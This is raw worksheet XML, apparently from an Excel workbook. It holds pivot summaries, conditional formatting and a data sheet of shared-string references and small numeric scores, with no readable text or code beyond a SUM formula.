        <v>379</v>
      </c>
      <c r="B10" s="8">
        <v>2.7777777777777777</v>
      </c>
      <c r="C10" s="8">
        <v>3</v>
      </c>
      <c r="D10" s="8">
        <v>3.2222222222222223</v>
      </c>
    </row>
    <row r="11" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11" s="7" t="s">
        <v>48</v>
      </c>
      <c r="B11" s="8">
        <v>2.6</v>
      </c>
      <c r="C11" s="8">
        <v>3.3</v>
      </c>
      <c r="D11" s="8">
        <v>0.7</v>
      </c>
    </row>
    <row r="12" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12" s="7" t="s">
        <v>334</v>
      </c>
      <c r="B12" s="8">
        <v>2.0833333333333335</v>
      </c>
      <c r="C12" s="8">
        <v>0</v>
      </c>
      <c r="D12" s="8">
        <v>0.58333333333333337</v>
      </c>
    </row>
    <row r="13" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13" s="7" t="s">
        <v>116</v>
      </c>
      <c r="B13" s="8">
        <v>2.1052631578947367</v>
      </c>
      <c r="C13" s="8">
        <v>0.5</v>
      </c>
      <c r="D13" s="8">
        <v>0.31578947368421051</v>
      </c>
    </row>
    <row r="14" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14" s="7" t="s">
        <v>226</v>
      </c>
      <c r="B14" s="8">
        <v>1.6111111111111112</v>
      </c>
      <c r="C14" s="8">
        <v>0.16666666666666666</v>
      </c>
      <c r="D14" s="8">
        <v>0.27777777777777779</v>
      </c>
    </row>
    <row r="15" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15" s="7" t="s">
        <v>572</v>
      </c>
    </row>
    <row r="16" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A16" s="7" t="s">
        <v>573</v>
      </c>
      <c r="B16" s="8">
        <v>1.8657407407407407</v>
      </c>
      <c r="C16" s="8">
        <v>0.79629629629629628</v>
      </c>
      <c r="D16" s="8">
        <v>0.56018518518518523</v>
      </c>
    </row>
  </sheetData>
  <conditionalFormatting pivot="1" sqref="B4:D14">
    <cfRule type="colorScale" priority="1">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percentile" val="50"/>
        <cfvo type="max"/>
        <color theme="9"/>
        <color rgb="FFFFEB84"/>
        <color rgb="FFFF00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AA65D-D74B-4049-840C-5A1842DE2EE2}">
  <dimension ref="A3:C17"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A16" sqref="A16"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="23.6640625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="15.1640625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="6" t="s">
        <v>571</v>
      </c>
      <c r="B3" t="s">
        <v>564</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="7" t="s">
        <v>15</v>
      </c>
      <c r="B4" s="5">
        <v>15</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="7" t="s">
        <v>305</v>
      </c>
      <c r="B5" s="5">
        <v>14</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6" s="7" t="s">
        <v>245</v>
      </c>
      <c r="B6" s="5">
        <v>42</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7" s="7" t="s">
        <v>380</v>
      </c>
      <c r="B7" s="5">
        <v>9</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" s="7" t="s">
        <v>6</v>
      </c>
      <c r="B8" s="5">
        <v>13</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A9" s="7" t="s">
        <v>12</v>
      </c>
      <c r="B9" s="5">
        <v>2</v>
      </c>
      <c r="C9">
        <f>SUM(B4:B11)</f>
        <v>127</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A10" s="7" t="s">
        <v>227</v>
      </c>
      <c r="B10" s="5">
        <v>18</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A11" s="7" t="s">
        <v>9</v>
      </c>
      <c r="B11" s="5">
        <v>14</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A12" s="7" t="s">
        <v>189</v>
      </c>
      <c r="B12" s="5">
        <v>18</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A13" s="7" t="s">
        <v>49</v>
      </c>
      <c r="B13" s="5">
        <v>10</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A14" s="7" t="s">
        <v>70</v>
      </c>
      <c r="B14" s="5">
        <v>23</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A15" s="7" t="s">
        <v>117</v>
      </c>
      <c r="B15" s="5">
        <v>38</v>
      </c>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A16" s="7" t="s">
        <v>572</v>
      </c>
      <c r="B16" s="5"/>
    </row>
    <row r="17" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A17" s="7" t="s">
        <v>573</v>
      </c>
      <c r="B17" s="5">
        <v>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6464-C1BE-D242-834E-4D5D2B69B1B4}">
  <sheetPr>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:J217"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="E1" sqref="E1"/>
      <selection pane="bottomLeft" activeCell="D1" sqref="D1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="10.83203125" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="37.1640625" style="1" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="19.6640625" style="1" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="25.33203125" style="1" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="58.33203125" style="1" customWidth="1"/>
    <col min="5" max="5" width="17.33203125" style="11" customWidth="1"/>
    <col min="6" max="6" width="54.83203125" style="3" customWidth="1"/>
    <col min="7" max="7" width="14.5" style="11" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="54.83203125" style="3" customWidth="1"/>
    <col min="9" max="9" width="14.5" style="11" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="54.83203125" style="3" customWidth="1"/>
    <col min="11" max="16384" width="10.83203125" style="3"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>586</v>
      </c>
      <c r="E1" s="9" t="s">
        <v>398</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>399</v>
      </c>
      <c r="G1" s="9" t="s">
        <v>400</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>401</v>
      </c>
      <c r="I1" s="9" t="s">
        <v>402</v>
      </c>
      <c r="J1" s="1" t="s">
        <v>403</v>
      </c>
    </row>
    <row r="2" spans="1:10" s="4" customFormat="1" ht="32" x14ac:dyDescent="0.2">
      <c r="A2" s="2" t="s">
        <v>4</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>5</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>6</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>7</v>
      </c>
      <c r="E2" s="10">
        <v>2</v>
      </c>
      <c r="F2" s="2" t="s">
        <v>427</v>
      </c>
      <c r="G2" s="10">
        <v>1</v>
      </c>
      <c r="H2" s="4" t="s">
        <v>429</v>
      </c>
      <c r="I2" s="10">
        <v>0</v>
      </c>
      <c r="J2" s="4" t="s">
        <v>430</v>
      </c>
    </row>
    <row r="3" spans="1:10" ht="45" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>8</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>10</v>
      </c>
      <c r="E3" s="11">
        <v>1</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>434</v>
      </c>
      <c r="G3" s="11">
        <v>0</v>
      </c>
      <c r="H3" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I3" s="11">
        <v>0</v>
      </c>
      <c r="J3" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="4" spans="1:10" ht="180" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>12</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>13</v>
      </c>
      <c r="E4" s="11">
        <v>0</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>441</v>
      </c>
      <c r="G4" s="11">
        <v>0</v>
      </c>
      <c r="H4" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I4" s="11">
        <v>2</v>
      </c>
      <c r="J4" s="3" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="5" spans="1:10" ht="45" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>15</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>16</v>
      </c>
      <c r="E5" s="11">
        <v>2</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>495</v>
      </c>
      <c r="G5" s="11">
        <v>0</v>
      </c>
      <c r="H5" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I5" s="11">
        <v>0</v>
      </c>
      <c r="J5" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="6" spans="1:10" ht="60" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>17</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>18</v>
      </c>
      <c r="E6" s="11">
        <v>2</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>459</v>
      </c>
      <c r="G6" s="11">
        <v>0</v>
      </c>
      <c r="H6" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I6" s="11">
        <v>0</v>
      </c>
      <c r="J6" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="7" spans="1:10" ht="30" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>15</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>20</v>
      </c>
      <c r="E7" s="11">
        <v>2</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>459</v>
      </c>
      <c r="G7" s="11">
        <v>0</v>
      </c>
      <c r="H7" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I7" s="11">
        <v>0</v>
      </c>
      <c r="J7" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="8" spans="1:10" ht="270" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>21</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>12</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>22</v>
      </c>
      <c r="E8" s="11">
        <v>2</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>511</v>
      </c>
      <c r="G8" s="11">
        <v>0</v>
      </c>
      <c r="H8" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I8" s="11">
        <v>0</v>
      </c>
      <c r="J8" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="9" spans="1:10" ht="60" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>23</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>24</v>
      </c>
      <c r="E9" s="11">
        <v>2</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>526</v>
      </c>
      <c r="G9" s="11">
        <v>0</v>
      </c>
      <c r="H9" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I9" s="11">
        <v>0</v>
      </c>
      <c r="J9" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="10" spans="1:10" ht="30" x14ac:dyDescent="0.2">
      <c r="A10" s="1" t="s">
        <v>25</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>26</v>
      </c>
      <c r="E10" s="11">
        <v>2</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>526</v>
      </c>
      <c r="G10" s="11">
        <v>0</v>
      </c>
      <c r="H10" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I10" s="11">
        <v>0</v>
      </c>
      <c r="J10" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="11" spans="1:10" ht="45" x14ac:dyDescent="0.2">
      <c r="A11" s="1" t="s">
        <v>27</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>28</v>
      </c>
      <c r="E11" s="11">
        <v>2</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>526</v>
      </c>
      <c r="G11" s="11">
        <v>0</v>
      </c>
      <c r="H11" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I11" s="11">
        <v>0</v>
      </c>
      <c r="J11" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="12" spans="1:10" ht="105" x14ac:dyDescent="0.2">
      <c r="A12" s="1" t="s">
        <v>29</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E12" s="11">
        <v>0</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>529</v>
      </c>
      <c r="G12" s="11">
        <v>0</v>
      </c>
      <c r="H12" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I12" s="11">
        <v>0</v>
      </c>
      <c r="J12" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="13" spans="1:10" ht="75" x14ac:dyDescent="0.2">
      <c r="A13" s="1" t="s">
        <v>31</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>32</v>
      </c>
      <c r="E13" s="11">
        <v>2</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>459</v>
      </c>
      <c r="G13" s="11">
        <v>0</v>
      </c>
      <c r="H13" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I13" s="11">
        <v>0</v>
      </c>
      <c r="J13" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="14" spans="1:10" ht="75" x14ac:dyDescent="0.2">
      <c r="A14" s="1" t="s">
        <v>33</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>34</v>
      </c>
      <c r="E14" s="11">
        <v>0</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>529</v>
      </c>
      <c r="G14" s="11">
        <v>0</v>
      </c>
      <c r="H14" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I14" s="11">
        <v>0</v>
      </c>
      <c r="J14" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="15" spans="1:10" ht="45" x14ac:dyDescent="0.2">
      <c r="A15" s="1" t="s">
        <v>35</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E15" s="11">
        <v>1</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>472</v>
      </c>
      <c r="G15" s="11">
        <v>0</v>
      </c>
      <c r="H15" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I15" s="11">
        <v>0</v>
      </c>
      <c r="J15" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="16" spans="1:10" ht="75" x14ac:dyDescent="0.2">
      <c r="A16" s="1" t="s">
        <v>37</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>38</v>
      </c>
      <c r="E16" s="11">
        <v>1</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>472</v>
      </c>
      <c r="G16" s="11">
        <v>0</v>
      </c>
      <c r="H16" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I16" s="11">
        <v>0</v>
      </c>
      <c r="J16" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="17" spans="1:10" ht="45" x14ac:dyDescent="0.2">
      <c r="A17" s="1" t="s">
        <v>39</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>40</v>
      </c>
      <c r="E17" s="11">
        <v>1</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>527</v>
      </c>
      <c r="G17" s="11">
        <v>0</v>
      </c>
      <c r="H17" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I17" s="11">
        <v>0</v>
      </c>
      <c r="J17" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="18" spans="1:10" ht="120" x14ac:dyDescent="0.2">
      <c r="A18" s="1" t="s">
        <v>41</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>42</v>
      </c>
      <c r="E18" s="11">
        <v>1</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>472</v>
      </c>
      <c r="G18" s="11">
        <v>0</v>
      </c>
      <c r="H18" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I18" s="11">
        <v>0</v>
      </c>
      <c r="J18" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="19" spans="1:10" ht="60" x14ac:dyDescent="0.2">
      <c r="A19" s="1" t="s">
        <v>43</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>44</v>
      </c>
      <c r="E19" s="11">
        <v>1</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>472</v>
      </c>
      <c r="G19" s="11">
        <v>0</v>
      </c>
      <c r="H19" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I19" s="11">
        <v>0</v>
      </c>
      <c r="J19" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="20" spans="1:10" ht="180" x14ac:dyDescent="0.2">
      <c r="A20" s="1" t="s">
        <v>45</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>46</v>
      </c>
      <c r="E20" s="11">
        <v>1</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>472</v>
      </c>
      <c r="G20" s="11">
        <v>0</v>
      </c>
      <c r="H20" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I20" s="11">
        <v>0</v>
      </c>
      <c r="J20" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="21" spans="1:10" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A21" s="1" t="s">
        <v>47</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>50</v>
      </c>
      <c r="E21" s="11">
        <v>2</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>480</v>
      </c>
      <c r="G21" s="11">
        <v>4</v>
      </c>
      <c r="H21" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I21" s="11">
        <v>0</v>
      </c>
      <c r="J21" s="3" t="s">
        <v>481</v>
      </c>
    </row>
    <row r="22" spans="1:10" ht="150" x14ac:dyDescent="0.2">
      <c r="A22" s="1" t="s">
        <v>51</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E22" s="11">
        <v>2</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>490</v>
      </c>
      <c r="G22" s="11">
        <v>4</v>
      </c>
      <c r="H22" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I22" s="11">
        <v>0</v>
      </c>
      <c r="J22" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="23" spans="1:10" ht="120" x14ac:dyDescent="0.2">
      <c r="A23" s="1" t="s">
        <v>53</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>54</v>
      </c>
      <c r="E23" s="11">
        <v>4</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>500</v>
      </c>
      <c r="G23" s="11">
        <v>4</v>
      </c>
      <c r="H23" s="3" t="s">
        <v>501</v>
      </c>
      <c r="I23" s="11">
        <v>2</v>
      </c>
      <c r="J23" s="3" t="s">
        <v>502</v>
      </c>
    </row>
    <row r="24" spans="1:10" ht="150" x14ac:dyDescent="0.2">
      <c r="A24" s="1" t="s">
        <v>55</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>56</v>
      </c>
      <c r="E24" s="11">
        <v>4</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>531</v>
      </c>
      <c r="G24" s="11">
        <v>4</v>
      </c>
      <c r="H24" s="3" t="s">
        <v>532</v>
      </c>
      <c r="I24" s="11">
        <v>3</v>
      </c>
      <c r="J24" s="3" t="s">
        <v>532</v>
      </c>
    </row>
    <row r="25" spans="1:10" ht="270" x14ac:dyDescent="0.2">
      <c r="A25" s="1" t="s">
        <v>57</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D25" s="1" t="s">
        <v>58</v>
      </c>
      <c r="E25" s="11">
        <v>4</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>539</v>
      </c>
      <c r="G25" s="11">
        <v>4</v>
      </c>
      <c r="H25" s="3" t="s">
        <v>540</v>
      </c>
      <c r="I25" s="11">
        <v>0</v>
      </c>
      <c r="J25" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="26" spans="1:10" ht="240" x14ac:dyDescent="0.2">
      <c r="A26" s="1" t="s">
        <v>59</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D26" s="1" t="s">
        <v>60</v>
      </c>
      <c r="E26" s="11">
        <v>2</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>538</v>
      </c>
      <c r="G26" s="11">
        <v>4</v>
      </c>
      <c r="H26" s="3" t="s">
        <v>540</v>
      </c>
      <c r="I26" s="11">
        <v>0</v>
      </c>
      <c r="J26" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="27" spans="1:10" ht="330" x14ac:dyDescent="0.2">
      <c r="A27" s="1" t="s">
        <v>61</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D27" s="1" t="s">
        <v>62</v>
      </c>
      <c r="E27" s="11">
        <v>2</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>537</v>
      </c>
      <c r="G27" s="11">
        <v>4</v>
      </c>
      <c r="H27" s="3" t="s">
        <v>540</v>
      </c>
      <c r="I27" s="11">
        <v>0</v>
      </c>
      <c r="J27" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="28" spans="1:10" ht="285" x14ac:dyDescent="0.2">
      <c r="A28" s="1" t="s">
        <v>63</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D28" s="1" t="s">
        <v>64</v>
      </c>
      <c r="E28" s="11">
        <v>2</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>541</v>
      </c>
      <c r="G28" s="11">
        <v>0</v>
      </c>
      <c r="H28" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I28" s="11">
        <v>0</v>
      </c>
      <c r="J28" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="29" spans="1:10" ht="195" x14ac:dyDescent="0.2">
      <c r="A29" s="1" t="s">
        <v>65</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D29" s="1" t="s">
        <v>66</v>
      </c>
      <c r="E29" s="11">
        <v>1</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>543</v>
      </c>
      <c r="G29" s="11">
        <v>1</v>
      </c>
      <c r="H29" s="3" t="s">
        <v>546</v>
      </c>
      <c r="I29" s="11">
        <v>0</v>
      </c>
      <c r="J29" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="30" spans="1:10" ht="330" x14ac:dyDescent="0.2">
      <c r="A30" s="1" t="s">
        <v>67</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D30" s="1" t="s">
        <v>68</v>
      </c>
      <c r="E30" s="11">
        <v>3</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>551</v>
      </c>
      <c r="G30" s="11">
        <v>4</v>
      </c>
      <c r="H30" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I30" s="11">
        <v>2</v>
      </c>
      <c r="J30" s="3" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="31" spans="1:10" ht="240" x14ac:dyDescent="0.2">
      <c r="A31" s="1" t="s">
        <v>71</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D31" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E31" s="11">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>451</v>
      </c>
      <c r="G31" s="11">
        <v>0</v>
      </c>
      <c r="H31" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I31" s="11">
        <v>0</v>
      </c>
      <c r="J31" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="32" spans="1:10" ht="255" x14ac:dyDescent="0.2">
      <c r="A32" s="1" t="s">
        <v>73</v>
      </c>
      <c r="B32" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D32" s="1" t="s">
        <v>74</v>
      </c>
      <c r="E32" s="11">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>444</v>
      </c>
      <c r="G32" s="11">
        <v>0</v>
      </c>
      <c r="H32" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I32" s="11">
        <v>0</v>
      </c>
      <c r="J32" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="33" spans="1:10" ht="285" x14ac:dyDescent="0.2">
      <c r="A33" s="1" t="s">
        <v>75</v>
      </c>
      <c r="B33" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D33" s="1" t="s">
        <v>76</v>
      </c>
      <c r="E33" s="11">
        <v>3</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>482</v>
      </c>
      <c r="G33" s="11">
        <v>0</v>
      </c>
      <c r="H33" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I33" s="11">
        <v>0</v>
      </c>
      <c r="J33" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="34" spans="1:10" ht="300" x14ac:dyDescent="0.2">
      <c r="A34" s="1" t="s">
        <v>404</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D34" s="1" t="s">
        <v>77</v>
      </c>
      <c r="E34" s="11">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>483</v>
      </c>
      <c r="G34" s="11">
        <v>0</v>
      </c>
      <c r="H34" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I34" s="11">
        <v>0</v>
      </c>
